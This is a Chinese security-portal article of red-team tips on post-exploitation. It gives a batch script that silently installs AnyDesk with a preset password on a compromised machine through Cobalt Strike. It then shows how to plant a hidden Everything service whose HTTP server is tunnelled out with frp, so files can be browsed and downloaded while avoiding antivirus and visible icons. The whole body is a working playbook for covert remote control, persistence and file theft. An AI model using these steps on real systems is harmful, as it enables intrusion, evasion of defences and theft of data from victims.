freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

【红队Tips】-Anydesk静默安装远控+利用EveryThing进行后渗透信息搜集
2022-06-17 12:18:51

05@深蓝实验华东天勇战队

Anydesk

前言:在进行内网渗透的时候,如果目标机器出网,但是有时候目标3389端口未开放 或 防火墙设置导致我们无法通过3389连上目标RDP进行远控。但是依然有很多第三方远程控制软件可以帮助我们,例如AnyDesk。

先修改bat文件里的目录名

1655439157_62abff35e673aa34003fb.png!small?1655439157550

@echo off
AnyDesk.exe --install "C:\Users\05\Videos\anydesk" --silent
echo licence_keyABC | "C:\Users\05\Videos\anydesk\AnyDesk.exe" --register-licence
echo anydesk!@# | "C:\Users\05\Videos\anydesk\AnyDesk.exe" --set-password
choice /t 10 /d y /n >nul
for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i
echo Connection ID Is: %CID%

上线cs后再把下面文件上传到目标机的目录上

1655439167_62abff3f6fa8b4d4f55fc.png!small?1655439166879

最后cs里运行AnyDesk.bat即可


1655439173_62abff45bc8536de5cb1d.png!small?1655439173193

成功拿到连接id,本机直接连接就行了

EveryThing

前言:

早在几年前就有很多apt组织利用everything来进行文件查找等,前几年在T00ls上也有人发过相关的文章,事实上在实战中用到的地方还是很多,而且他还是个白进程,支持命令行。

配置

1.先在官网下载64位的便携版https://www.voidtools.com/Everything-1.4.1.1009.x64.zip
2.然后在自己电脑上打开everything,配置好下面相关配置。

取消显示托盘图标

1655439381_62ac0015132769178ec5f.png!small?1655439380733

注意:如果不取消该选项的话,会在右下角出现一个比较显眼的everything图标,增加暴露的风险

启用HTTP服务器

1655439388_62ac001c29d6fbcb45801.png!small?1655439388020

绑定的ip是127.0.0.1,这样的话相关杀毒软件就不会拦截,然后用frp把端口映射出来就完事了,账号密码可以根据自己的需求来设置

实现(UAC权限运行)

1.配置完相关设置后,在Everything的目录下会出现相关配置文件,如下图(我们只需要下面画圈的两个文件就可以了

1655439395_62ac002396119b4f155b2.png!small?1655439395208

2.将Everything主程序和配置文件丢到目标电脑上。

3.用命令行Everything.exe -install-client-service 给Everything安装一个自启服务,无感运行,杀软不拦截
安装服务得UAC权限

1655439401_62ac00297f1dac5c9d3d0.png!small?1655439401377

4.接下来服务就启动起来了,端口也打开了.

1655439414_62ac00366bff662dfb67d.png!small?1655439414000

记得用frp把你设置的端口映射出来哦,Everything可在线看很多东西,也可直接下载,这不比cs啥的翻文件舒服?

# 系统安全 # 内网渗透 # 后渗透 # 后渗透工具 # 后渗透权限维持
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录